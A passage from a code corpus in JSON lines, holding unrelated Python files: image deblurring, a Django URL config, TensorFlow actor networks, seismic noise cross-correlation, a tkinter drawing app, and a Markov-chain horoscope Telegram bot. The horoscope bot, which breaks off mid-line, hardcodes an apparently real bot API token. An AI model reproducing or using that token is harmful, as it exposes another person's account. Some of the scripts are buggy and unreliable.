plugins.update(self._get_commands(plugin))\n\n return plugins\n\n def _load_plugins(self):\n logger.info(\"Loading plugins...\")\n plugins = self._get_plugins()\n logger.info(\"Registering commands!\")\n self.register_commands(plugins)\n logger.info(\"Commands added!\")\n","sub_path":"eduzen_bot/telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":5437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"476641059","text":"#!/usr/bin/env python\n# -*- coding:UTF-8 -*-\n'''\n@author: Jackie Chen\n@Time: 17/12/11\n@File: blur.py\n@Project: pattern-recognize\n'''\nfrom skimage import io,data,filters,color\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\ndef PSFestiamte(C,PSF,Fw,beta,noiseLevel):\n F = np.fft.fft2(np.zeros(np.shape(C)))\n Cabs = np.abs(C)\n Gwabs = np.abs(PSF)\n cond0 = (Cabs < noiseLevel)\n cond1 = (Gwabs >= Cabs) & (~cond0)\n cond2 = (Gwabs < Cabs) & (~cond0)\n F[cond0] = Fw[cond0]\n F[cond1] = (1.-beta)*Fw[cond1] + beta*np.divide(C[cond1], PSF[cond1])\n tmp = np.divide((1.-beta), (Fw[cond2] +\n np.divide(beta*PSF[cond2],C[cond2])))\n F[cond2] = 
np.divide(1.,tmp)\n return F\n\ndef blur():\n #blur\n #img = data.chelsea()\n img = data.chelsea()\n #img = color.rgb2gray(img)\n #img = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n #img = color.rgb2gray(img)\n img = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n kernel = np.ones((5,5),np.float32)/16\n #multi method for blur\n #dst = cv2.filter2D(img,-1,kernel)\n\n dst_color = cv2.GaussianBlur(data.chelsea(),(5,5),0)\n dst = cv2.GaussianBlur(img,(5,5),0) #image after Gaussian Blur\n dst_tmp = dst\n #restore\n\n pw = cv2.bilateralFilter(img,9,15,15)\n #compare to bilateralFilter used by opencv\n size_psf = 12\n wpsf = np.zeros(np.shape(dst))\n wpsf[0:size_psf,0:size_psf] = 1\n\n beta = 0.8 #param for iteration\n noiseLevel = 1\n itertime = 40\n fw = dst\n C = np.fft.fft2(dst)\n PSF = np.zeros(np.shape(C)) #PSF=GW\n\n for i in range(itertime):\n Fw = np.fft.fft2(dst)\n #print Fw\n G = PSFestiamte(C,Fw,PSF,beta,noiseLevel)\n g = np.real(np.fft.ifft2(G))\n gw = g\n #print gw\n\n for i in range(gw.shape[0]):\n for j in range(gw.shape[1]):\n if gw[i,j] < 0.:\n gw[i,j] = 0\n gw = gw*wpsf\n gw_sum = np.sum(gw)\n gw = gw/gw_sum\n Gw = np.fft.fft2(gw)\n\n F = PSFestiamte(C,Gw,Fw,beta,noiseLevel)\n f = np.real(np.fft.ifft2(F))\n fw = f\n for i in range(fw.shape[0]):\n for j in range(fw.shape[1]):\n if fw[i,j] < 0.:\n fw[i,j] = 0\n E = np.sum(np.abs(fw)-np.abs(f))\n fw = fw + E/(np.shape(img)[0]*np.shape(img)[1])\n\n plt.subplot(221),plt.imshow(data.chelsea())\n plt.title('init')\n plt.subplot(222),plt.imshow(dst_color)\n plt.title('GaussianBlur')\n plt.subplot(223),plt.imshow(dst_tmp,cmap='gray')\n plt.title('GaussianBlur_Gray')\n plt.subplot(224),plt.imshow(fw,cmap='gray')\n plt.title('recovery')\n plt.show()","sub_path":"src/blur.py","file_name":"blur.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"236830702","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nclass VideoCapture:\n def __init__(self):\n #vc = cv2.CascadeClassifier(\"./haar/coches.xml\")\n vc = cv2.CascadeClassifier(\".\\\\haar\\\\coches.xml\")\n #ruta = \"./Videos/video2.wmv\"\n ruta = \".\\\\Videos\\\\video2.wmv\"\n\n detector = cv2.VideoCapture(ruta)\n ret, frame = detector.read()\n while frame is not None:\n escalaGris = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n coches = vc.detectMultiScale(escalaGris,1.1,10,flags=cv2.cv.CV_HAAR_SCALE_IMAGE)\n for (x,y,w,h) in coches:\n cv2.rectangle(escalaGris,(x,y),(x+w,y+h),(0,225,0),2)\n cv2.imshow('Video',escalaGris)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n ret,frame = detector.read()\n detector.release()\n cv2.destroyAllWindows()","sub_path":"Practica3Definitiva/VideoCapture.py","file_name":"VideoCapture.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"643895985","text":"# Copyright 2018 The TensorFlow Authors All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language 
governing permissions and\n# limitations under the License.\n# ==============================================================================\n\n\"\"\"Sample actor(policy) and critic(q) networks to use with DDPG/NAF agents.\n\nThe DDPG networks are defined in \"Section 7: Experiment Details\" of\n\"Continuous control with deep reinforcement learning\" - Lilicrap et al.\nhttps://arxiv.org/abs/1509.02971\n\nThe NAF critic network is based on \"Section 4\" of \"Continuous deep Q-learning\nwith model-based acceleration\" - Gu et al. https://arxiv.org/pdf/1603.00748.\n\"\"\"\n\nimport tensorflow as tf\nslim = tf.contrib.slim\nimport gin.tf\n\n\n@gin.configurable('sac_actor_net')\ndef actor_net(states, action_spec,\n hidden_layers=(400, 300),\n normalizer_fn=None,\n activation_fn=tf.nn.relu,\n zero_obs=False,\n images=False):\n \"\"\"Creates an actor that returns actions for the given states.\n\n Args:\n states: (castable to tf.float32) a [batch_size, num_state_dims] tensor\n representing a batch of states.\n action_spec: (BoundedTensorSpec) A tensor spec indicating the shape\n and range of actions.\n hidden_layers: tuple of hidden layers units.\n normalizer_fn: Normalizer function, i.e. slim.layer_norm,\n activation_fn: Activation function, i.e. tf.nn.relu, slim.leaky_relu, ...\n Returns:\n A tf.float32 [batch_size, num_action_dims] tensor of actions.\n \"\"\"\n\n with slim.arg_scope(\n [slim.fully_connected],\n activation_fn=activation_fn,\n normalizer_fn=normalizer_fn,\n weights_initializer=slim.variance_scaling_initializer(\n factor=1.0/3.0, mode='FAN_IN', uniform=True)):\n\n states = tf.to_float(states)\n orig_states = states\n if images or zero_obs: # Zero-out x, y position. Hacky.\n states *= tf.constant([0.0] * 2 + [1.0] * (states.shape[1] - 2))\n if hidden_layers:\n states = slim.stack(states, slim.fully_connected, hidden_layers,\n scope='states')\n with slim.arg_scope([slim.fully_connected],\n weights_initializer=tf.random_uniform_initializer(\n minval=-0.003, maxval=0.003)):\n actions = slim.fully_connected(states,\n 2 * action_spec.shape.num_elements(),\n scope='actions',\n normalizer_fn=None,\n activation_fn=None)\n\n means, log_vars = tf.split(actions, 2, axis=(-1))\n action_means = (action_spec.maximum + action_spec.minimum) / 2.0\n action_magnitudes = (action_spec.maximum - action_spec.minimum) / 2.0\n means = action_means + action_magnitudes * tf.nn.tanh(means)\n\n log_vars = 6 * tf.nn.tanh(log_vars) - 3.0 # between -9 and +3\n\n return tf.concat([means, log_vars], (-1))\n","sub_path":"agents/sac_networks.py","file_name":"sac_networks.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"411663212","text":"import uuid\n\nfrom source.query.merger.task import MergerTasksGenerator\nfrom source.query.scores_service.domain import MergerKey\nfrom source.storage.stores.artifact_store.interface import ArtifactStoreInterface\nfrom source.storage.stores.artifact_store.types.quest.evaluation import OriginIndexJobArtifact\nfrom source.storage.stores.results_store.interface import ResultsStoreInterface\nfrom source.task_runner.handler_interface import TaskHandlerInterface\nfrom source.task_runner.submitter_interface import TaskSubmitterInterface\nfrom source.task_runner.tasks.dispatch_mergers_task import DispatchMergersTask\n\n\nclass MergerDispatchExecutor(TaskHandlerInterface):\n def __init__(self, scores_merger_task_generator, task_submitter, artifact_store, quest_general_store):\n \"\"\"\n 
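        Store the collaborators used by handle_task: the merger-task generator, the task submitter, and the artifact/quest stores.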
@type scores_merger_task_generator: L{MergerTasksGenerator}\n @type task_submitter: L{TaskSubmitterInterface}\n @type artifact_store: L{ArtifactStoreInterface}\n @type quest_general_store: L{GeneralQuestDataStoreInterface}\n \"\"\"\n self.__artifact_store = artifact_store\n self.__task_submitter = task_submitter\n self.__scores_merger_task_generator = scores_merger_task_generator\n self.__quest_general_store = quest_general_store\n\n def handle_task(self, dispatch_task):\n \"\"\"\n @type dispatch_task: C{DispatchMergersTask}\n \"\"\"\n if dispatch_task.jobnik_session is None:\n job_id = uuid.uuid4().get_hex()\n else:\n job_id = dispatch_task.jobnik_session.job_token['jobId']\n\n generated_tasks = self.__scores_merger_task_generator.get_tasks(job_id, dispatch_task.customer,\n dispatch_task.quest_id,\n dispatch_task.query_id, dispatch_task.ml_conf,\n dispatch_task.merger_conf,\n dispatch_task.is_past,\n dispatch_task.jobnik_session,\n dispatch_task.query_execution_unit.seed,\n dispatch_task.feature_flags)\n\n total_num_tasks = len(generated_tasks) + 1 # Add one task for us\n\n for generated_task in generated_tasks:\n generated_task.total_num_tasks = total_num_tasks\n\n # We need to specify how many tasks remain for when our caller reports progress\n dispatch_task.total_num_tasks = total_num_tasks\n\n self.__task_submitter.submit_tasks(dispatch_task.job_id, 'merge_scores', generated_tasks)\n\n origin_index = self.__create_origin_index(generated_tasks)\n self.__quest_general_store.store_mergers_origin_index(dispatch_task.customer, dispatch_task.quest_id, dispatch_task.query_id, origin_index)\n self.__artifact_store.store_artifact(\n OriginIndexJobArtifact(dispatch_task.customer, dispatch_task.quest_id, dispatch_task.query_id, 'mergers', origin_index))\n\n @staticmethod\n def get_task_type():\n return DispatchMergersTask\n\n @staticmethod\n def __create_origin_index(tasks):\n \"\"\"\n @type tasks: C{list} of C{MergerTask}\n @rtype C{dict}\n \"\"\"\n origin_index = {}\n\n for task in tasks:\n task_config = task.task_config\n merger_key = MergerKey(task_config['merger_model'], task_config['variant'], task_config['scorer_id'])\n origin_id = ResultsStoreInterface.create_merger_origin_id(merger_key)\n origin_index[origin_id] = {\n 'scorer_id': task_config['scorer_id'],\n 'merger_model': task_config['merger_model'],\n 'variant': task_config['variant'],\n }\n\n return origin_index\n","sub_path":"internal/source/query/merger/dispatch/merger_dispatch_executor.py","file_name":"merger_dispatch_executor.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"377388606","text":"\"\"\"kerala_relief URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.urls import include, path\r\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.contrib import admin\r\nfrom django.urls import path,include\r\nfrom . 
import views\r\nfrom donate.views import Donate\r\nfrom django.conf import settings\r\nfrom django.conf.urls.static import static\r\nurlpatterns = [\r\n    path('admin/', admin.site.urls),\r\n    # path('',views.IndexPage.as_view(),name='index'),\r\n    path('',views.index,name='index'),\r\n\r\n    path('accounts',include('accounts.urls',namespace='')),\r\n    path('accounts', include('django.contrib.auth.urls')),\r\n    path('test',views.TestPage.as_view(),name='test'),\r\n    path('thanks',views.ThanksPage.as_view(),name='thanks'),\r\n    path('donate', include('donate.urls')),\r\n    path('medicalcare', include('medicalcare.urls',namespace='medical')),\r\n    path('statistics',include('record.urls')),\r\n    path('weather',include('weather.urls',namespace='weatherr')),\r\n    path('complaint', include('complaint.urls',namespace='complaint')),\r\n\r\n]\r\nif settings.DEBUG:\r\n    urlpatterns +=static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)\r\n","sub_path":"src/kerala_relief/kerala_relief/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"377151715","text":"import json\nimport ast\n\nrooms = open('rooms.txt', 'r+')\n# print(rooms.read())\n\nroom_directions = open('room_directions.txt', 'r+')\n# print(room_directions.read())\n\nterrain = open('terrain.txt', 'r+')\n\nroom_directions = json.load(room_directions)\nterrain = json.load(terrain)\n# rooms = json.load(rooms)\n\nnew_rooms = {}\ncounter = 0\n\n# for i in terrain:\n#     x = terrain.get(f\"{i}\")\n\n#     i = int(i)\n\n#     print(i, x)\n#     print(type(i))\n\n\nfor room in rooms:\n    room = ast.literal_eval(room)\n\n    for room_d in room_directions:\n        room_d = int(room_d)\n        print(room_d)\n        print(type(room_d))\n        print(type(room['room_id']))\n        new_rooms = dict([(room_d, room['room_id'])])\n        if room_d not in new_rooms and room_d == room['room_id']:\n            new_rooms[room_d] = room['room_id']\n        # , (room['room_id']) = ([room['terrain'], room_directions[room_d]])\n\n    print('new_rooms length: ', len(new_rooms))\n\n# with open('terrain.txt', 'w') as f:\n#     f.write(json.dumps(new_rooms, indent=4))\n","sub_path":"conversions.py","file_name":"conversions.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"418375317","text":"import requests\n\n# Prepare the request data\nurl = 'http://test.lemonban.com/futureloan/mvc/api/member/register'\ndata = {\n    'mobilephone': '13133333334',\n    'pwd': '123456',\n    'regname': 'Jax'\n}\n# Send the request; the data argument carries the form fields\nresponse = requests.post(url=url, data=data)\n# Get the response content\nprint(response.text)\n# Reading the response with json(): it can only be used when the returned content is in JSON format\n# The json() method converts the returned JSON string into the corresponding Python dict or list\nprint(response.json())","sub_path":"study/study_requests/test_send_post.py","file_name":"test_send_post.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"81914685","text":"import csv\nimport re\n\nwith open('faculty.csv') as csvfile:\n    readCSV = csv.reader(csvfile, delimiter=',')\n    degrees = []\n    titles = []\n    emails = []\n# Get degree, titles, emails\n    for row in readCSV:\n        degree = row[1]\n        title = row[2]\n        email = row[3]\n\n        degrees.append(degree)\n        titles.append(title)\n        emails.append(email)\n# find number of degrees and frequency\n    for i in range(0,len(degrees)):\n        degrees[i] = degrees[i].lstrip(' ') # remove space at beginning\n        degrees[i] = re.sub('[0\.]', '', degrees[i]) # remove
periods & '0'\n degrees[i] = re.split(' ', degrees[i])\n\n degrees = sum(degrees, []) # flattens the nested lists\n\n from collections import Counter\n print(Counter(degrees)) # Q1 gives frequency of each degree\n\n print(Counter(titles)) # Q2 gives frequency of each titles\n\n emailList = emails[1:len(emails)] # gets rid of header\n print(emailList) # Q3 prints list of emails\n\n for i in range(0,len(emails)):\n emails[i] = re.sub('.*[\\@]', '', emails[i]) # remove everything before '@'\n\n domains = list(set(emails[1:len(emails)])) # use set to remove duplicates\n\n print(domains) # Q4, list of domains\n\n\n","sub_path":"python/advanced_python_regex.py","file_name":"advanced_python_regex.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"9527353","text":"import sys\nimport pygame\n\n\ndef sprite_loader(sprite_width, sprite_height, sheet_file):\n sprite_frames = []\n\n image = pygame.image.load(sheet_file).convert_alpha()\n width, height = image.get_size()\n\n for r in range(int(height / sprite_height)):\n for c in range(int(width / sprite_width)):\n sprite_frames.append(image.subsurface((c * sprite_width, r * sprite_height, sprite_width, sprite_height)))\n\n return sprite_frames\n\npygame.init()\n\nFRAMES_PER_SECOND = 60\nWIZARD_SPEED = 10\n\nscreen = pygame.display.set_mode((640, 400))\npygame.display.set_caption('The Wizard is Waving')\n\nframes = sprite_loader(50, 72, 'duke_spritesheet.png')\nnumber_of_sprites = len(frames)\ntimer = pygame.time.Clock()\n\n# We are now going to have a red rectangle move across the screen at a constant speed.\n# By varying the frame rate it is possible to compare the Dukes movements with the speed\n# of the rectangle. 
The desired result should be that the waving should not change that\n# much but the speed of the rect will.\nrect_x_position = 0\nframe_counter = 0\ncurrent_frame = 0\n\nrunning = True\n\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT :\n running = False\n sys.exit()\n\n screen.fill((200, 200, 200))\n screen.blit(frames[int(current_frame)], (100, 100))\n\n # A little fix should the FPS go below 10.\n frame_control = FRAMES_PER_SECOND\n if frame_control < 10:\n frame_control = 10\n\n # The Duke now waves all the time\n frame_counter = (frame_counter + 1) % frame_control\n current_frame = frame_counter // (frame_control / WIZARD_SPEED)\n\n # the rect_x_position is increased by 2 every round.\n rect_x_position += 2\n\n # Since we are using this program to visually compare the movement of its\n # artifacats, we implement a \"wrap-around\" functionality for the rectangle.\n if rect_x_position >= 640:\n rect_x_position = -30\n # We draw the rectangle\n pygame.draw.rect(screen, (255, 0, 0), pygame.Rect(rect_x_position, 300, 30, 30))\n\n pygame.display.update()\n timer.tick(FRAMES_PER_SECOND)\n","sub_path":"Python/FORR2HF05CU/Lokaverkefni/Sýniverkefni/05_PyGame/spritesheet_6.py","file_name":"spritesheet_6.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"133879848","text":"import numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\n\r\ndata_path = '../LogosClean/commonformat/ImageSets/data2.txt'\r\nclasses_path = '../LogosClean/classes.txt'\r\n\r\ndata = np.loadtxt(data_path, dtype=str, delimiter='|')\r\nclasses = np.loadtxt(classes_path, dtype=str, delimiter='|')\r\nclasses = np.array([c.replace(' ', '') for c in classes])\r\nclass_to_int = dict(zip(classes, range(len(classes))))\r\n\r\ny = []\r\nfor i in range(len(data)):\r\n classname = data[i].split('/')[0]\r\n y.append(int(class_to_int[classname]))\r\n\r\ncounts = dict(zip(np.arange(len(class_to_int)), np.array([y.count(x) for x in range(len(classes))])))\r\nvalid_keys = np.array([key for key in counts.keys() if counts[key] >= 10])\r\n\r\n\r\n\r\n# train_data, test_data, train_y, test_y = train_test_split(X, y, test_size=0.1, stratify=y)\r\n# print(test_data)","sub_path":"misc_utils/scripts/logos/split_train_test.py","file_name":"split_train_test.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"150885880","text":"import tkinter as tk\nimport tkinter.ttk as ttk\nfrom PIL import ImageTk, Image, ImageDraw\nimport PIL\nimport numpy as np\nfrom os.path import basename\nimport glob\nimport sys\nsys.path.append('..')\n\nfrom utils.predict import predict\n\nclass DrawFrame():\n\tdef __init__(self, frame=None, main_window=None):\n\t\tself.frame = frame\n\t\tself.main_window = main_window\n\t\tself._xold = None\n\t\tself._yold = None\n\t\tself.canvas = None\n\t\tself.color = 'Black'\n\t\tself.thickness = 15\n\t\tself.tag = ['tag', '0']\n\n\t\tself.models = []\n\t\tself.image1 = PIL.Image.new('RGB', (400, 400), (255, 255, 255))\n\t\tself.draw = ImageDraw.Draw(self.image1)\n\n\t\tself._create_widgets()\n\n\tdef _create_widgets(self):\n\t\tttk.Label(self.frame, text=\"Select Model for Prediction:\").grid(row=0, column=0, columnspan=2, padx=5, pady=5, sticky='w')\n\n\t\tself.network_select = ttk.Combobox(self.frame, state=\"readonly\", 
values=self.models)\n\t\tself.scan_model_dir()\n\t\tself.network_select.grid(row=1, column=0, columnspan=2, padx=5, sticky='news')\n\n\t\tttk.Label(self.frame, text=\" \").grid(row=2, column=0, columnspan=2, sticky='w')\n\n\t\tself.canvas = tk.Canvas(self.frame, width=400, height=400, bg='white')\n\t\tself.canvas.grid(row=3, column=0, columnspan=2, padx=5, pady=0)\n\t\ttk.Button(self.frame, text='Clear', bg='brown', fg='white', activebackground='brown4', activeforeground='white', command=self._clear).grid(row=4, column=0, padx=5, sticky='news')\n\t\ttk.Button(self.frame, text='Predict', bg='brown', fg='white', activebackground='brown4', activeforeground='white', command=self._save).grid(row=4, column=1, padx=5, sticky='news')\n\t\t# draw while the left button is dragged, reset the stroke on release\n\t\tself.canvas.bind('<ButtonRelease-1>', self._on_up)\n\t\tself.canvas.bind('<B1-Motion>', self._on_motion)\n\n\t\ttk.Label(self.frame, text=\"Predicted Letter:\").grid(row=5, column=0, columnspan=2, padx=5, pady=10, sticky='w')\n\t\tself.predictedlabel = tk.StringVar()\n\t\tself.predictedlabel.set(\"-\")\n\t\ttk.Label(self.frame, textvariable=self.predictedlabel, font=(None, 50)).grid(row=6, column=0, columnspan=2, sticky='w')\n\n\n\tdef _clear(self):\n\t\tself.canvas.delete('all')\n\t\tself.image1 = PIL.Image.new('RGB', (400, 400), (255, 255, 255))\n\t\tself.draw = ImageDraw.Draw(self.image1)\n\t\tself.tag = ['tag', '0']\n\n\tdef _on_up(self, event):\n\t\tself._xold = None\n\t\tself._yold = None\n\t\tself.tag = ['tag', str(int(self.tag[1])+1)]\n\n\tdef _on_motion(self, event):\n\t\ttag = ''.join(self.tag)\n\t\tx1, y1 = (event.x - self.thickness), (event.y - self.thickness)\n\t\tx2, y2 = (event.x + self.thickness), (event.y + self.thickness)\n\t\tevent.widget.create_oval(x1, y1, x2, y2, width=0, fill=self.color, tag=tag)\n\n\t\tif self._xold is not None and self._yold is not None:\n\t\t\tself.canvas.create_oval(x1, y1, x2, y2, width=0, fill=self.color, tag=tag)\n\t\t\tself.canvas.create_line(self._xold, self._yold, event.x, event.y, smooth=True, width=2*self.thickness, fill=self.color, tag=tag)\n\t\t\tself.draw.line([x1, y1, x2, y2],fill='black',width=self.thickness+5)\n\n\t\tself._xold = event.x\n\t\tself._yold = event.y\n\n\n\tdef _save(self):\n\t\tfrom PIL import ImageOps  # local import: PIL.ImageOps is not available via the bare 'import PIL' at the top\n\t\tfilename = 'number.jpeg'\n\t\timage = self.image1.resize((28, 28)).convert('L')\n\t\timage = ImageOps.invert(image)\n\n\t\t# image.save(filename, 'JPEG')\n\t\timgarray = np.asarray(image.getdata()).reshape((28,28))\n\n\t\tself.predictedlabel.set(str(predict(self.main_window, imgarray, self.network_select.get())))\n\n\tdef scan_model_dir(self):\n\t\tself.models = [basename(x) for x in glob.glob('architecture/models/*.ckpt')]\n\t\tself.network_select.config(values=self.models)\n\t\tif len(self.models) != 0:\n\t\t\tself.network_select.current(0)\n\t\treturn\n","sub_path":"interface/draw_frame.py","file_name":"draw_frame.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"546617427","text":"#!/usr/bin/env python\n# by TR\nfrom obspy.core import UTCDateTime as UTC\nfrom sito.data import IPOC\nfrom sito.noisexcorr import (prepare, get_correlations,\n                             plotXcorrs, noisexcorrf, stack, getFilters)\nfrom sito import util\nimport matplotlib.pyplot as plt\nfrom sito.stream import read\nfrom multiprocessing import Pool\nimport time\n\ndef main():\n    stations = 'PB01 PB02 PB03 PB04 PB05 PB06 PB07 PB08 HMBCX MNMCX PATCX PSGCX'\n\n    components = 'Z'\n    # Tocopilla earthquake: 2007-11-14 15:14\n    t1 = UTC('2006-07-01')\n    t2 = UTC('2008-12-31')\n\n    shift = 500\n
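    # 'shift' is the lag window passed to noisexcorrf below (units are not stated in this script; seconds assumed)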
correlations = get_correlations(stations, components)\n\n method = 'FINAL_filter0.005-10_1bit_Tocopilla'\n\n data = IPOC(xcorr_append='/' + method, use_local_LVC=False)\n data.setXLogger('_' + method)\n pool = Pool()\n prepare(data, stations.split(), t1, t2, component=components,\n filter=(0.005, 10, 2, True), downsample=20,\n whitening=False,\n normalize='1bit', param_norm=None,\n pool=pool)\n noisexcorrf(data, correlations, t1, t2, shift, pool=pool)\n pool.close()\n pool.join()\n stack(data, correlations, dt=10 * 24 * 3600, shift=5 * 24 * 3600)\n stack(data, correlations, dt= -1)\n\n filters = None\n #filters = getFilters((0.005, 0.01, 0.1, 1, 5, 10), zerophase=True, corners=2)\n# plotXcorrs(data, correlations, t1, t2, start=None, end=None, filters=filters, plot_overview=True, plot_years=False, use_dlognorm=False,\n# plot_stack=True, plot_psd=True, add_to_title='', downsample=None)\n plotXcorrs(data, correlations, t1=None, t2=None, start=None, end=None, filters=filters, plot_overview=True, plot_years=False, use_dlognorm=False,\n plot_stack=True, plot_psd=True, add_to_title='', downsample=None, stack=('10days', '5days'))\n\n\n# ms = read(data.x_day % ('PB03Z', '*') + '.QHD')\n# tr = ms.calculate('mean')\n# tr.plot()\n# ipshell()\n\n# util.checkDir(data.getPlotX(('', ''), t1))\n #for correlation in correlations:\n# stations = correlation[0][:-1], correlation[1][:-1]\n# dist = data.stations.dist(*stations)\n## if dist >= 120:\n## t = (dist // 100) * 50 + 50\n## else:\n## t = 70\n# t = 200\n# stream = data.readDayXcorr(correlation, t1, t2)\n# if len(stream) > 0:\n# stream.plotXcorr(-t, t, imshow=True, vmax=0.01, vmin_rel='vmax',\n# fig=plt.figure(figsize=(8.267, 11.693)),\n# figtitle='station ' + method + ' around Tocopilla event',\n# dateformatter='%y-%m-%d', show=False,\n# save=data.getPlotX(correlation, 'Tocopilla_0.01.png'),\n# stack_lim=None)\n\nif __name__ == '__main__':\n main()\n","sub_path":"bin/noise/noise_s_final_Tocopilla.py","file_name":"noise_s_final_Tocopilla.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"586424788","text":"import PyPDF2\n\nfile_name = 'C:\\\\Users\\\\vipin\\\\Desktop\\\\NotificationEvents_AutomationCust1_14-Feb-2018_14-Feb-2018.pdf'\nwith open(file_name, 'rb') as pdfFileObj:\n pdfReader = PyPDF2.PdfFileReader(pdfFileObj)\n print(pdfReader.numPages)\n count=0\n for count in range(pdfReader.numPages):\n pageObj = pdfReader.getPage(count)\n text = pageObj.extractText()\n print(text)\n if \"Voice Connections(Number)\" in text:\n print(\"Success\")","sub_path":"Module/testpdf.py","file_name":"testpdf.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"602171500","text":"import telebot\nfrom random import choice\nimport random\nimport datetime\nfrom datetime import date\n\nAPI_TOKEN = '312164149:AAHGpHx3chsDOQ-dqWwqC_tW-fCf4ukQ6cA'\nbot = telebot.TeleBot(API_TOKEN)\n\nhoroscope = {}\n\ndef getTextFromHoroscope(sign):\n d = date.today()\n if (d, sign) not in horoscope:\n horoscope[(d, sign)] = gen_horoscope()\n\n return horoscope[(d, sign)]\n\ndef prepare_horoscope():\n with open('text.txt', encoding='utf-8') as f:\n global words\n words = []\n words = f.read().split()\n markov_chain = {}\n for i in range(0, len(words) - 2):\n key = (words[i], words[i+1])\n markov_chain.setdefault(key, [])\n markov_chain[key].append(words[i+2])\n return markov_chain\n\ndef 
gen_horoscope():\n    stopsentence = (\".\", \"!\", \"?\",)\n    markov_chain = prepare_horoscope()\n    size = 25\n    gen_words = []\n    seed = random.randint(0, len(words) - 3)\n    w1 = words[seed]\n    while (w1.isupper() or w1.islower()):\n        seed = random.randint(0, len(words) - 3)\n        w1 = words[seed]\n    w2 = words[seed+1]\n\n    for i in range(0, size-1):\n        gen_words.append(w1)\n        try:\n            w3 = choice(markov_chain[(w1,w2)])\n        except KeyError:\n            break\n        w1, w2 = w2, w3\n\n    while True:\n        gen_words.append(w1)\n        if w1[-1] in stopsentence:\n            break\n        try:\n            w3 = choice(markov_chain[(w1,w2)])\n        except KeyError:\n            break\n        w1, w2 = w2, w3\n    result = ' '.join(gen_words)\n    return result\n\n\ndef sign_period(ast_sign):\n    periods = {\n        'Овен': '20 марта — 19 апреля',\n        'Телец': '20 апреля — 20 мая',\n        'Близнецы': '21 мая — 20 июня',\n        'Рак': '21 июня — 22 июля',\n        'Лев': '23 июля — 22 августа',\n        'Дева': '23 августа — 22 сентября',\n        'Весы': '23 сентября — 22 октября',\n        'Скорпион': '23 октября — 21 ноября',\n        'Стрелец': '22 ноября — 21 декабря',\n        'Козерог': '22 декабря — 19 января',\n        'Водолей': '21 января — 18 февраля',\n        'Рыбы': '19 февраля — 19 марта',\n    }\n\n\n    get_period = periods[ast_sign]\n    return get_period\nsign = [\"Овен\", \"Телец\", \"Близнецы\", \"Рак\", \"Лев\", \"Дева\", \"Весы\", \"Скорпион\", \"Стрелец\", \"Козерог\", \"Водолей\", \"Рыбы\"]\n\n# Handle '/start' and '/help'\n@bot.message_handler(commands=['help', 'start'])\ndef send_welcome(message):\n    bot.reply_to(message, \"Привет! Тебя приветствует известный ученый психолог Форер! Он может предсказать твое будущее! Думаешь компьютеры плохие астрологи? Давай проверим! Хочешь? /Yes\")\n\n@bot.message_handler(commands=['No'])\ndef no_message(message):\n    bot.send_message(message.chat.id, \"Жаль, жаль! Если передумаешь нажимай /Yes, твой Форер\")\n@bot.message_handler(commands=['Yes'])\ndef yes_message(message):\n    bot.send_message(message.chat.id, \"Здорово, напиши нам свой знак зодиака \")\n\n@bot.message_handler(func=lambda message: 